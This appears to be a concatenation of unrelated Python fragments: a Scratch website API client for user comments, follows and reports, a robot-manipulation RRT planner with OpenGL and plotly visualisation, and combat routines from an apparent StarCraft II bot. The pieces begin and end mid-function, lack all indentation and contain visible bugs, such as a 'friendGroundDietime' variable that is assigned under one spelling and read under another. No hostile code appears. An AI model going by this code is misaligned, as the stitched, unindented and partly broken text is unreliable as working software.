data = str(result[i])[index + 1:]
j = 0
comment_time = ""
while data[j] != '"':
comment_time += data[j]
j += 1
if not replies:
parent = True
else:
parent = False
comment = {
"Username": user,
"Content": content,
"Time": comment_time,
"IsReply": parent,
"Replies": replies,
"CommentID": id
}
comments.append(comment)
# Return a list of comments
return [UserComment(data, self._client, self._headers) for data in comments]
def post_comment(self, content, parent_id="", commentee_id=""):
data = {
"commentee_id": commentee_id,
"content": content,
"parent_id": parent_id,
}
requests.post(
"https://scratch.mit.edu/site-api/comments/user/" + self.username + "/add/",
headers=self._headers,
data=json.dumps(data),
)
def report(self, field):
data = {"selected_field": field}
requests.post(
"https://scratch.mit.edu/site-api/users/all/" + self.username + "/report/",
headers=self._headers,
data=json.dumps(data),
)
def toggle_commenting(self):
requests.post(
"https://scratch.mit.edu/site-api/comments/user/"
+ self.username
+ "/toggle-comments/",
headers=self._headers,
)
def follow(self):
return requests.put(
"https://scratch.mit.edu/site-api/users/followers/"
+ self.username
+ "/add/?usernames="
+ self._client.username,
headers=self._headers,
).json()
def unfollow(self):
return requests.put(
"https://scratch.mit.edu/site-api/users/followers/"
+ self.username
+ "/remove/?usernames="
+ self._client.username,
headers=self._headers,
).json()
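# Illustrative sketch (not part of the original module): every paginated
# get_* method above repeats the same loop, requesting 40 items at a time
# until a short page signals the end. A hypothetical shared helper
# expressing that pattern:
def _fetch_all_pages(url):
    """Page through a Scratch API list endpoint 40 items at a time."""
    items = []
    offset = 0
    while True:
        res = requests.get(url + "?limit=40&offset=" + str(offset)).json()
        items += res
        if len(res) != 40:
            break
        offset += 40
    return items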
class AnotherUser:
def __init__(self, data, client):
self.id = data["id"]
self.username = data["username"]
self.joined_timestamp = data["history"]["joined"]
self.scratchteam = data["scratchteam"]
self.scrather = requests.get(f"https://isscratcher.9pfs.repl.co/api/{self.username}").json()["isScratcher"]
self.profile = AnotherUserProfile(data["profile"], self)
self._client = client
self._headers = {
"x-csrftoken": self._client.csrf_token,
"X-Token": self._client.token,
"x-requested-with": "XMLHttpRequest",
"Cookie": "scratchcsrftoken="
+ self._client.csrf_token
+ ";scratchlanguage=en;scratchsessionsid="
+ self._client.session_id
+ ";",
"referer": "https://scratch.mit.edu/users/" + self.username + "/",
}
def get_projects(self, all=False, limit=20, offset=0):
if all:
projects = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/projects/"
+ "?limit=40&offset="
+ str(offset)
).json()
projects += res
if len(res) != 40:
break
offset += 40
for x, i in enumerate(projects):
projects[x].update({
"author": {"username": self.username}
})
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
else:
projects = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/projects/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json()
for x, i in enumerate(projects):
projects[x].update({
"author": {"username": self.username}
})
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
def get_curating(self, all=False, limit=20, offset=0):
if all:
studios = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/studios/curate"
+ "?limit=40&offset="
+ str(offset)
).json()
studios += res
if len(res) != 40:
break
offset += 40
return list(map(self._client._to_studio, studios))
else:
return list(
map(
self._client._to_studio,
requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/studios/curate/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json(),
)
)
def get_favorites(self, all=False, limit=20, offset=0):
if all:
projects = []
offset = 0
while True:
res = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/favorites/"
+ "?limit=40&offset="
+ str(offset)
).json()
projects += res
if len(res) != 40:
break
offset += 40
for x, i in enumerate(projects):
projects[x]["author"] = {"username": self.username}
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
else:
projects = requests.get(
"https://api.scratch.mit.edu/users/"
+ self.username
+ "/favorites/"
+ "?limit="
+ str(limit)
+ "&offset="
+ str(offset)
).json()
for x, i in enumerate(projects):
projects[x]["author"] = {"username": self.username}
return [
YourProject(i, self._client) if i["author"]["username"] == self._client.username else AnotherProject(i,
self._client)
for i in projects]
import glm
from itbl import Ray, Shader
from itbl.accelerators import SDF, BVHAccel
from itbl.cameras import TrackballCamera
from itbl.shapes import Box
from itbl.util import get_color, get_data
from itbl.viewer import Application, Viewer
from itbl.viewer.backend import *
from wilson import *
import itbl._itbl as _itbl
import time
from kinorrt.search_space import SearchSpace
from kinorrt.mechanics.contact_kinematics import *
import random
from kinorrt.mechanics.stability_margin import *
from kinorrt.rrt import RRTManipulation
import plotly.graph_objects as go
class iTM2d(Application):
def __init__(self, object_shape, example='sofa'):
# Initialize scene.
super(iTM2d, self).__init__(None)
self.mesh = Box(1.0, 0.5, 0.2)
self.light_box = Box(0.2, 0.2, 0.2)
self.example = example
self.object_shape = object_shape
def init(self):
super(iTM2d, self).init()
# Basic lighting shader.
vertex_source = os.path.join(get_data(), 'shader', 'basic_lighting.vs')
fragment_source = os.path.join(get_data(), 'shader', 'basic_lighting.fs')
self.basic_lighting_shader = Shader(vertex_source, fragment_source)
# Lamp shader.
vertex_source = os.path.join(get_data(), 'shader', 'flat.vs')
fragment_source = os.path.join(get_data(), 'shader', 'flat.fs')
self.lamp_shader = Shader(vertex_source, fragment_source)
# Normal shader.
vertex_source = os.path.join(get_data(), 'shader', 'normals.vs')
fragment_source = os.path.join(get_data(), 'shader', 'normals.fs')
geometry_source = os.path.join(get_data(), 'shader', 'normals.gs')
self.normal_shader = Shader(vertex_source, fragment_source, geometry_source)
# Trackball camera.
self.camera = TrackballCamera(radius=50)
# Toggle variables.
self.draw_mesh = True
self.draw_wireframe = True
self.draw_normals = False
def init2(self):
# C++ OpenGL.
_itbl.loadOpenGL()
# 2D shader.
vertex_source = os.path.join(get_data(), 'shader', '2d.vs')
fragment_source = os.path.join(get_data(), 'shader', '2d.fs')
self.flat_shader = Shader(vertex_source, fragment_source)
# Object
self.env_contacts = None
self.manip_contacts = None
self.manifold = None
self.v_m = None
self.counter = 0
self.target = _itbl.Rectangle(self.object_shape[0] * 2, self.object_shape[1] * 2, 2, 0.0)
if self.example == 'sofa':
self.collision_manager = create_hallway(HALLWAY_W, BLOCK_W, BLOCK_H, self.object_shape[
0] * 2.5 + BLOCK_W * 0.5) # uniform_sample_maze((4,4), 3, 1.25)
elif self.example == 'maze':
self.collision_manager = uniform_sample_maze((3, 3), 3, 1.25)
elif self.example == 'corner':
self.collision_manager = corner()
elif self.example == 'wall':
self.collision_manager = wall()
elif self.example == 'table':
self.collision_manager = corner()
elif self.example == 'obstacle_course':
self.collision_manager = obstacle_course()
elif self.example == 'peg-in-hole-v':
self.collision_manager = peg_in_hole_v()
elif self.example == 'peg-in-hole-p':
self.collision_manager = peg_in_hole_p()
elif self.example == 'book':
self.collision_manager = book()
elif self.example == 'unpacking':
self.collision_manager = unpacking()
else:
raise ValueError('Cannot find collision manager for example: %s' % self.example)
self.all_configs_on = False
self.step_on = False
self.path_on = False
self.manip_p = None
self.next_manip_p = None
def draw_manifold(self):
if self.manifold is None:
return
glPointSize(5)
manifold = self.manifold
for i in range(len(manifold.depths)):
glBegin(GL_POINTS)
cp = manifold.contact_points[i]
glVertex3f(cp[0], cp[1], 1)
glEnd()
glBegin(GL_LINES)
d = manifold.depths[i]
n = manifold.normals[i]
cq = cp - d * n
glVertex3f(cp[0], cp[1], 1)
glVertex3f(cq[0], cq[1], 1)
glEnd()
def draw_ground(self):
glBegin(GL_LINES)
# ground line
glVertex3f(-10, 0, -1)
glVertex3f(10, 0, -1)
# hashes
for x in np.arange(-10, 10, 0.1):
glVertex3f(x, 0, -1)
glVertex3f(x - 0.1, -0.1, -1)
glEnd()
def draw_grid(self, size, step):
glBegin(GL_LINES)
glColor3f(0.3, 0.3, 0.3)
for i in np.arange(step, size, step):
glVertex3f(-size, i, 0) # lines parallel to X-axis
glVertex3f(size, i, 0)
glVertex3f(-size, -i, 0) # lines parallel to X-axis
glVertex3f(size, -i, 0)
glVertex3f(i, -size, 0) # lines parallel to Z-axis
glVertex3f(i, size, 0)
glVertex3f(-i, -size, 0) # lines parallel to Z-axis
glVertex3f(-i, size, 0)
# x-axis
glColor3f(0.5, 0, 0)
glVertex3f(-size, 0, 0)
glVertex3f(size, 0, 0)
# z-axis
glColor3f(0, 0, 0.5)
glVertex3f(0, -size, 0)
glVertex3f(0, size, 0)
glEnd()
def render(self):
glClearColor(0.2, 0.3, 0.3, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glEnable(GL_DEPTH_TEST)
glEnable(GL_MULTISAMPLE)
glEnable(GL_BLEND)
# glEnable(GL_CULL_FACE)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
self.basic_lighting_shader.use()
print_opengl_error()
model = glm.mat4(1.0)
self.basic_lighting_shader.set_mat4('model', np.asarray(model))
view = self.camera.get_view()
self.basic_lighting_shader.set_mat4('view', np.asarray(view))
projection = glm.perspective(glm.radians(45.0), 1200. / 900, 0.1, 100.0)
self.basic_lighting_shader.set_mat4('projection', np.asarray(projection))
# colors
# self.basic_lighting_shader.set_vec3('objectColor', np.array([1.0, 0.5, 0.31], 'f'))
self.basic_lighting_shader.set_vec3('lightColor', np.array([1.0, 1.0, 1.0], 'f'))
# light
lightPos = glm.vec3([1.00, 1.75, 10.0])
self.basic_lighting_shader.set_vec3('lightPos', np.asarray(lightPos))
# camera
cameraPos = glm.vec3(glm.column(glm.inverse(view), 3))
self.basic_lighting_shader.set_vec3('viewPos', np.asarray(cameraPos))
# Draw object.
if self.draw_mesh:
# Draw obstacles.
self.basic_lighting_shader.set_vec3('objectColor', get_color('gray'))
self.collision_manager.draw(self.basic_lighting_shader.id, True, True)
# Draw object.
self.basic_lighting_shader.set_vec3('objectColor', get_color('clay'))
self.target.draw3d(self.basic_lighting_shader.id)
# Draw normals.
self.normal_shader.use()
self.normal_shader.set_mat4('model', np.asarray(model))
self.normal_shader.set_mat4('view', np.asarray(view))
self.normal_shader.set_mat4('projection', np.asarray(projection))
if self.draw_normals:
self.mesh.draw(self.normal_shader)
# Draw edges and light.
self.lamp_shader.use()
self.lamp_shader.set_mat4('model', np.asarray(model))
self.lamp_shader.set_mat4('view', np.asarray(view))
self.lamp_shader.set_mat4('projection', np.asarray(projection))
self.lamp_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
if self.draw_wireframe:
# Draw object.
self.target.draw3d(self.lamp_shader.id)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
light_model = glm.mat4(1.0)
light_model = glm.translate(light_model, lightPos)
self.lamp_shader.set_mat4('model', np.asarray(light_model))
# self.light_box.draw(self.lamp_shader)
self.lamp_shader.set_mat4('model', np.asarray(model))
self.lamp_shader.set_vec3('objectColor', get_color('teal'))
model = glm.mat4(1.0)
self.lamp_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
self.lamp_shader.set_mat4('model', np.asarray(model))
# self.draw_grid(5, 0.25)
def render2(self):
glClearColor(0.2, 0.3, 0.3, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glEnable(GL_DEPTH_TEST)
glEnable(GL_MULTISAMPLE)
# glEnable(GL_BLEND)
# glEnable(GL_CULL_FACE)
# glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
# glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
self.flat_shader.use()
model = glm.mat4(1.0)
self.flat_shader.set_mat4('model', np.asarray(model))
view = glm.mat4(1.0)
self.flat_shader.set_mat4('view', np.asarray(view))
aspect_ratio = 800. / 600.
d = 10
ortho = glm.ortho(-d * aspect_ratio, d * aspect_ratio, -d, d, -100.0, 100.0)
# ortho = glm.ortho(-2*aspect_ratio, 2*aspect_ratio, -2, 2, -100.0, 100.0)
self.flat_shader.set_mat4('projection', np.asarray(ortho))
self.flat_shader.set_vec3('offset', np.zeros((3, 1), 'float32'))
self.flat_shader.set_float('scale', 1.0)
self.flat_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
# self.draw_grid(5, 0.25)
# Draw obstacles.
self.flat_shader.set_vec3('objectColor', get_color('gray'))
self.collision_manager.draw(self.flat_shader.id, True, False)
if self.step_on:
# Draw object.
new_m = point_manipulator()
if self.counter >= len(self.path):
self.counter = 0
self.config = self.path[self.counter]
self.manip_p = self.mnp_path[self.counter]
if self.manip_p is not None:
for mnp in self.manip_p:
p = mnp.p
p = p[0:2]
new_m.update_config(np.array(p),self.config)
self.flat_shader.set_vec3('objectColor', get_color('red'))
new_m.obj.draw2d(self.flat_shader.id, True)
self.flat_shader.set_vec3('objectColor', get_color('clay'))
T2 = config2trans(np.array(self.config))
T3 = np.identity(4)
T3[0:2, 3] = T2[0:2, 2]
T3[0:2, 0:2] = T2[0:2, 0:2]
self.target.transform()[:, :] = T3
self.target.draw2d(self.flat_shader.id, True)
# print(self.counter, len(self.path))
time.sleep(0.07)
self.counter += 1
if self.path_on:
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
for i in range(len(self.path)):
self.flat_shader.set_vec3('objectColor', get_color('clay'))
target_config = self.path[i]
T2 = config2trans(np.array(target_config))
T3 = np.identity(4)
T3[0:2, 3] = T2[0:2, 2]
T3[0:2, 0:2] = T2[0:2, 0:2]
self.target.transform()[:, :] = T3
self.target.draw2d(self.flat_shader.id, True)
if self.all_configs_on:
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
# show all nodes
for node in self.nodes:
self.flat_shader.set_vec3('objectColor', get_color('clay'))
target_config = np.array(node)
T2 = config2trans(target_config)
T3 = np.identity(4)
T3[0:2, 3] = T2[0:2, 2]
T3[0:2, 0:2] = T2[0:2, 0:2]
self.target.transform()[:, :] = T3
self.target.draw2d(self.flat_shader.id, True)
def on_key_press2(self, key, scancode, action, mods):
if key == glfw.KEY_C and action == glfw.PRESS:
self.step_on = False
self.path_on = False
self.all_configs_on = False
if key == glfw.KEY_T and action == glfw.PRESS:
self.step_on = True
if key == glfw.KEY_A and action == glfw.PRESS:
self.all_configs_on = True
if key == glfw.KEY_P and action == glfw.PRESS:
self.path_on = True
def on_key_press(self, key, scancode, action, mods):
pass
# def on_mouse_press(self, x, y, button, modifiers):
# pass
# def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
# pass
def on_mouse_press(self, x, y, button, modifiers):
x = 2.0 * (x / 800.0) - 1.0
y = 2.0 * (y / 600.0) - 1.0
if button == 1: # left click
self.camera.mouse_roll(x, y, False)
if button == 4: # right click
self.camera.mouse_zoom(x, y, False)
def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
x = 2.0 * (x / 800.0) - 1.0
y = 2.0 * (y / 600.0) - 1.0
if buttons == 1: # left click
self.camera.mouse_roll(x, y)
if buttons == 4: # right click
self.camera.mouse_zoom(x, y)
def get_path(self, path, mnp_path):
self.path = path
self.mnp_path = mnp_path
def get_nodes(self, nodes):
self.nodes = nodes
def get_tree(self, tree):
self.tree = tree
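# Illustrative sketch (not part of the original script): render2() above
# expands an (x, y, theta) configuration into a 4x4 homogeneous transform
# three separate times. The repeated pattern, factored out (helper name
# hypothetical; assumes config2trans returns a 3x3 planar transform):
def config_to_mat4(config):
    T2 = config2trans(np.array(config))  # 3x3 SE(2) matrix
    T3 = np.identity(4)
    T3[0:2, 3] = T2[0:2, 2]      # 2D translation into the 4x4 transform
    T3[0:2, 0:2] = T2[0:2, 0:2]  # 2D rotation block
    return T3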
object_shape = [1, 0.2, 0.2, 0.2]
X_dimensions = np.array([(-4.5, 4.5), (2, 3.5), (-2 * np.pi, 2 * np.pi)])
x_init = (0, 2.2, 0)
x_goal = (0, 3, -np.pi / 2)
world_key = 'vert'
dist_weight = 1
mnp_fn_max = 6
goal_kch = [0.01, 0.1, 1]
allow_contact_edges = [True, False, True, False]
viewer = Viewer()
_itbl.loadOpenGL()
manipulator = doublepoint_manipulator()
mnp_fn_max = None
step_length = 2
neighbor_r = 5
dist_cost = 1
app = iTM2d(object_shape, example='book')
viewer.set_renderer(app)
viewer.init()
X = SearchSpace(X_dimensions)
the_object = part(app.target, object_shape, allow_contact_edges)
rrt_tree = RRTManipulation(X, x_init, x_goal, environment(app.collision_manager), the_object, manipulator,
50, neighbor_r, world_key)
x = (-2.3, 2.2, 0)
x_rand = (-2.5, 2.2, -np.pi)
x_rand1 = (-3,3.5,-np.pi/3)
_, envs = rrt_tree.check_collision(x)
mnps = [Contact((-0.8,0.2),(0,-1),0),Contact((-0.8,-0.2),(0,1),0)]
mode = [CONTACT_MODE.FOLLOWING,CONTACT_MODE.FOLLOWING,CONTACT_MODE.SLIDING_LEFT,CONTACT_MODE.LIFT_OFF]
x_new, path, _ = rrt_tree.forward_integration(x,x_rand,envs,mnps,mode)
path += [(-2.432,3,-np.pi/2)]
x_new, path1, _ = rrt_tree.forward_integration(x,x_rand1,envs,mnps,mode)
path1 += [(-2.432,3,-np.pi/2)]
print(x_new)
print(path)
boundary = []
for theta in np.arange(0,np.pi/2,0.1):
q = (-3-1*np.cos(theta)+0.2*np.sin(theta), 2+0.2*np.cos(theta)+1*np.sin(theta),-theta)
boundary += [q]
boundary += [(-2.8,3,-np.pi/2)]
for x0 in np.arange(-2.8,-1.1,0.1):
boundary += [(x0,3,-np.pi/2)]
boundary += [(-1.1,3,-np.pi/2)]
b0 = []
for theta in np.arange(0,np.pi/2,0.1):
q = (-1.3-1*np.cos(theta)+0.2*np.sin(theta), 2+0.2*np.cos(theta)+1*np.sin(theta),-theta)
b0 += [q]
b0.reverse()
boundary+=b0
for x0 in np.arange(-4,-2.3,0.1):
boundary += [(x0,2.2,0)]
'''
x1, path1, _ = rrt_tree.forward_integration(x,(-4,2.2,0),envs,mnps,mode)
x2, path2, _ = rrt_tree.forward_integration(x,(-4,2.2,-np.pi/4),envs,mnps,mode)
x3, path3, _ = rrt_tree.forward_integration(x,(-3,2.6,-np.pi/3),envs,mnps,mode)
x4, path4, _ = rrt_tree.forward_integration(x,(-4,3,-np.pi),envs,mnps,mode)
x5, path5, _ = rrt_tree.forward_integration(x,(-0.5,3,-np.pi),envs,mnps,mode)
x6, path6, _ = rrt_tree.forward_integration(x,(-4,3,-np.pi/2.5),envs,mnps,mode)
x7, path7, _ = rrt_tree.forward_integration(x,(-2,3,-np.pi),envs,mnps,mode)
'''
xb, yb, zb = np.array(boundary).T
#xs, ys, zs = np.array(boundary + path+path1+path2+path3+path4+path5+path6+path7).T
x,y,z = np.array(path).T
x1,y1,z1 = np.array(path1).T
fig = go.Figure()
fig.add_trace(go.Scatter3d(x=xb, y=zb, z=yb, mode='lines', line={'width':8, 'color':'blue'},name='Manifold Boundary'))
# fig.add_trace(go.Scatter3d(x=xs, y=ys, z=zs, mode='markers', opacity=0.50))
fig.add_trace(go.Scatter3d(x=x, y=z, z=y, name='trajectory 1', mode='lines+markers',line={'width':4,'color':'green'},marker={'size':4,'color':'green'}))
fig.add_trace(go.Scatter3d(x=x1, y=z1, z=y1,name='trajectory 2', mode='lines+markers',line={'width':4,'color':'red'}, marker={'size':4,'color':'red'}))
fig.add_trace(go.Scatter3d(x=[x_rand[0]], y=[x_rand[2]], z=[x_rand[1]], mode='markers',name = 'goal 1', marker={'size':6,'color':'green'}))
fig.add_trace(go.Scatter3d(x=[x_rand1[0]], y=[x_rand1[2]], z=[x_rand1[1]],mode='markers',name = 'goal 2', marker={'size':6,'color':'red'}))
fig.update_layout(
scene={
'xaxis_title': 'x',
'yaxis_title': 'θ',
'zaxis_title': 'y',
}
)
if unit_obj.checkNewAction('move', self.rally_pos.x, self.rally_pos.y):
unit_obj.game.combinedActions.append(unit_obj.unit.move(self.rally_pos))
unit_obj.last_target = None
return True
return False
def defend(self, unit_obj):
#clear out destructables around the base.
# for nexus in self.units(NEXUS):
# items = self.destructables.closer_than(15, nexus)
# if items:
# item = items.closest_to(nexus)
# if item.name == 'CollapsibleTerranTowerDiagonal' or item.name == 'CollapsibleRockTowerDiagonal':
# continue
# unit_obj.game.combinedActions.append(unit_obj.unit.attack(item))
# unit_obj.last_target = None
# unit_obj.last_action = 'Destructables'
# return True
if self.defensive_pos and unit_obj.unit.distance_to(self.defensive_pos) > 5:
if unit_obj.checkNewAction('move', self.defensive_pos.x, self.defensive_pos.y):
unit_obj.game.combinedActions.append(unit_obj.unit.move(self.defensive_pos))
unit_obj.last_target = None
return True
return False
def waitForce(self, unit_obj, bonus_range=0):
#evaluates battle conditions before joining the battle.
#only use early in game for probing, terrible in late game.
if self.time > 180:
return False
#check to see if we are defending and if we are near our own bases, if so attack anyway.
if self.defend_only and self.units(NEXUS).closer_than(25, unit_obj.unit):
return False #defending, attack!
#check to see if we are already in battle, if so just exist.
#if anyone is in our range or attack, if we are in anyone elses range of attack.
unit_range = unit_obj.unit.ground_range + bonus_range
if unit_obj.unit.air_range > unit_obj.unit.ground_range:
unit_range = unit_obj.unit.air_range + bonus_range
#see if any enemies are in our range.
enemyThreats = unit_obj.closestEnemies.not_structure.filter(lambda x: unit_obj.unit.target_in_range(x, bonus_distance=bonus_range))
if enemyThreats:
return False #already engaged.
#stay out of enemy range.
enemyThreats = unit_obj.closestEnemies.filter(lambda x: x.target_in_range(unit_obj.unit, bonus_distance=1 + bonus_range))
if enemyThreats:
return False #already engaged.
#now evaluate to see if we need to keep moving, or just stand still.
enemyThreats = unit_obj.closestEnemies.sorted(lambda x: x.distance_to(unit_obj.unit))
[enemyDPStoGround, enemyDPStoAir, enemyAirHealth, enemyGroundHealth, enemyTotalDPS, closestEnemy, enemyGroundtoAirDPS, enemyAirtoGroundDPS, enemyGroundtoGroundDPS, enemyAirtoAirDPS] = self.getAllEnemyStats(unit_obj)
#get all the friends near the closest enemy.
if closestEnemy:
[friendDPStoGround, friendDPStoAir, friendAirHealth, friendGroundHealth, friendTotalDPS] = self.unitList.friendlyEngagedFighters(closestEnemy)
###if there is an enemy on the ground but no grounddps, then we can't damage the enemy and need to leave.
if enemyGroundHealth > 0 and friendDPStoGround == 0 and enemyGroundtoAirDPS > 0:
self.stayMaxRange(unit_obj, closestEnemy)
return True
if enemyAirHealth > 0 and friendDPStoAir == 0 and enemyAirtoGroundDPS > 0:
self.stayMaxRange(unit_obj, closestEnemy)
return True
#calculate our die times.
enemyAirDieTime = 0
enemyGroundDieTime = 0
enemyOverDieTime = 0
friendAirDieTime = 0
friendGroundDietime = 0
friendOverDieTime = 0
if friendDPStoAir > 0:
enemyAirDieTime = enemyAirHealth / friendDPStoAir
if friendDPStoGround > 0:
enemyGroundDieTime = enemyGroundHealth / friendDPStoGround
if friendTotalDPS > 0:
enemyOverDieTime = (enemyAirHealth + enemyGroundHealth) / friendTotalDPS
if enemyDPStoAir > 0:
friendAirDieTime = friendAirHealth / enemyDPStoAir
if enemyDPStoGround > 0:
friendGroundDietime = friendGroundHealth / enemyDPStoGround
if enemyTotalDPS > 0:
friendOverDieTime = (friendAirHealth + friendGroundHealth) / enemyTotalDPS
if (friendAirDieTime + friendGroundDieTime) > 0 and (enemyAirDieTime + enemyGroundDieTime) == 0:
#print ('Danger found')
self.stayMaxRange(unit_obj, closestEnemy)
return True
#check if overall battle can be won.
if friendOverDieTime < enemyOverDieTime:
self.stayMaxRange(unit_obj, closestEnemy)
return True
if (friendAirDieTime + friendGroundDieTime) < (enemyAirDieTime + enemyGroundDieTime):
#print ('Danger found')
self.stayMaxRange(unit_obj, closestEnemy)
return True
return False
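#Illustrative sketch (assumed names, not part of the original bot): the
#engagement test above reduces to comparing time-to-die on each side. A
#minimal standalone version, using infinity instead of the zero-sentinel
#convention used above, might look like this:
def should_disengage(friend_hp, friend_dps, enemy_hp, enemy_dps):
    #time for each side to kill the other; zero DPS means "never"
    friend_die_time = friend_hp / enemy_dps if enemy_dps > 0 else float('inf')
    enemy_die_time = enemy_hp / friend_dps if friend_dps > 0 else float('inf')
    #back off whenever our side would die first
    return friend_die_time < enemy_die_time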
def effectSafe(self, unit_obj):
#stay safe from objects and effects.
foundEffect = self.dodgeEffects(unit_obj)
if foundEffect:
#find the closest movable position away from the effect.
#create a grid around the unit.
possibles = []
if unit_obj.unit.is_flying:
possibles = self.retreatGrid(foundEffect[0], size=ceil(foundEffect[1] + unit_obj.unit.radius))
else:
possibles = self.groundRetreatGrid(foundEffect[0], size=ceil(foundEffect[1] + unit_obj.unit.radius))
if len(possibles) == 0:
return False
#calculate the distance of the remaining grid positions away from the effect.
closestPosition = None
closestDistance = 100
for position in possibles:
effectAwayDist = foundEffect[0].distance_to(position)
if effectAwayDist < foundEffect[1]:
continue #skip positions that are still inside the effect radius.
#calculate the distance of the positions from ourselves.
ourAwayDist = unit_obj.unit.distance_to(position)
if ourAwayDist < closestDistance:
closestDistance = ourAwayDist
closestPosition = position
#move to the closest of the remaining positions.
if closestPosition:
if unit_obj.checkNewAction('move', closestPosition[0], closestPosition[1]):
self.combinedActions.append(unit_obj.unit.move(closestPosition))
if unit_obj.unit.is_selected or _debug_combat:
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p3AddZ(self.turn3d(closestPosition.position)), color=Point3((219, 136, 4)))
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p2AddZ(closestPosition), color=Point3((0, 255, 55)))
if unit_obj.unit.name == 'Probe':
self.worker_moved = self.time + 3
return True
return False
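#Illustrative sketch (assumed plain (x, y) tuples, not the bot's grid helpers):
#the dodge above amounts to "pick the candidate position nearest to us that is
#outside the effect radius":
import math

def closest_safe_position(unit_pos, effect_pos, effect_radius, candidates):
    #keep only candidates outside the effect circle
    safe = [p for p in candidates if math.dist(p, effect_pos) >= effect_radius]
    #of those, move to the one closest to the unit (None if nothing is safe)
    return min(safe, key=lambda p: math.dist(p, unit_pos), default=None)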
def keepSafe(self, unit_obj):
#if in danger, cancel channeled abilities and retreat to safety.
(danger, closestEnemy) = self.inDangerSimple(unit_obj)
if danger:
#if we are a phoenix, drop our target if needed.
if unit_obj.unit.name == 'Phoenix' and AbilityId.CANCEL_GRAVITONBEAM in unit_obj.abilities:
unit_obj.beam_unit = None
self.combinedActions.append(unit_obj.unit(AbilityId.CANCEL_GRAVITONBEAM))
return True
if self.goRetreat(unit_obj, closestEnemy):
return True
return False
def KeepKiteRange(self, unit_obj, bonus_range=0):
#kite if we can.
targetEnemy = self.findKiteTarget(unit_obj, bonus_range)
if targetEnemy:
if not targetEnemy.name in ['Carrier', 'Battlecruiser', 'PlanetaryFortress', 'Bunker'] and not (targetEnemy.can_attack_air or targetEnemy.can_attack_ground) and unit_obj.closestEnemies.filter(lambda x: x.can_attack_air or x.can_attack_ground).exists:
#print ('found better kite target')
return False #better targets out there.
#kitePoint = unit_obj.unit.position.towards(targetEnemy.position, distance=-0.1)
kitePoint = self.findKiteBackTarget(unit_obj, targetEnemy)
if len(kitePoint) > 0:
if unit_obj.checkNewAction('move', kitePoint[0], kitePoint[1]):
self.combinedActions.append(unit_obj.unit.move(kitePoint))
if unit_obj.unit.is_selected or _debug_combat:
unit_obj.last_target = kitePoint.position
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p3AddZ(targetEnemy.position3d), color=Point3((0, 206, 3)))
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p2AddZ(kitePoint), color=Point3((212, 66, 244)))
return True
return False
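#Illustrative sketch (assumed names, not the bot's findKiteBackTarget helper):
#the simplest kite step moves the unit directly away from its target while the
#weapon is on cooldown:
def simple_kite_point(unit_pos, enemy_pos, step=1.0):
    dx, dy = unit_pos[0] - enemy_pos[0], unit_pos[1] - enemy_pos[1]
    norm = (dx * dx + dy * dy) ** 0.5 or 1.0  #avoid division by zero
    #step away from the enemy along the unit-enemy axis
    return (unit_pos[0] + dx / norm * step, unit_pos[1] + dy / norm * step)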
def attack(self, unit_obj, bonus_range=0):
if unit_obj.unit.weapon_cooldown == 0:
targetEnemy = self.findBestTarget(unit_obj, bonus_range)
if targetEnemy:
#check if this is a melee unit, and do a move attack instead of target attack.
if not unit_obj.unit.is_flying and unit_obj.unit.ground_range < 2:
self.combinedActions.append(unit_obj.unit.attack(targetEnemy.position))
else:
self.combinedActions.append(unit_obj.unit.attack(targetEnemy))
unit_obj.last_action = 'attack'
if unit_obj.unit.is_selected or _debug_combat:
unit_obj.last_target = Point3((targetEnemy.position3d.x, targetEnemy.position3d.y, (targetEnemy.position3d.z + 1)))
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p3AddZ(targetEnemy.position3d), color=Point3((219, 4, 4)))
return True
return False
def doNothing(self, unit_obj):
#if our weapon is on cooldown, but we have enemies in range, then we just do nothing.
if unit_obj.unit.weapon_cooldown != 0:
targetEnemy = unit_obj.closestEnemies.in_attack_range_of(unit_obj.unit)
#targetEnemy = self.findBestTarget(unit_obj.unit)
if targetEnemy:
#enemies in range, do nothing.
if unit_obj.checkNewAction('wait', 0, 0):
self.combinedActions.append(unit_obj.unit.stop())
unit_obj.last_target = Point3((targetEnemy.first.position3d.x, targetEnemy.first.position3d.y, (targetEnemy.first.position3d.z + 1)))
return True
return False
def moveToFriendlies(self, unit_obj):
#if we are moving and no enemies exist, then we must be searching, so return False.
if unit_obj.unit.is_moving and len(self.cached_enemies) == 0:
return False
closestFriendly = None
fUnits = self.units().filter(lambda x: x.type_id not in {WARPPRISM,OBSERVER,PROBE,PHOENIX}
and not x.is_structure
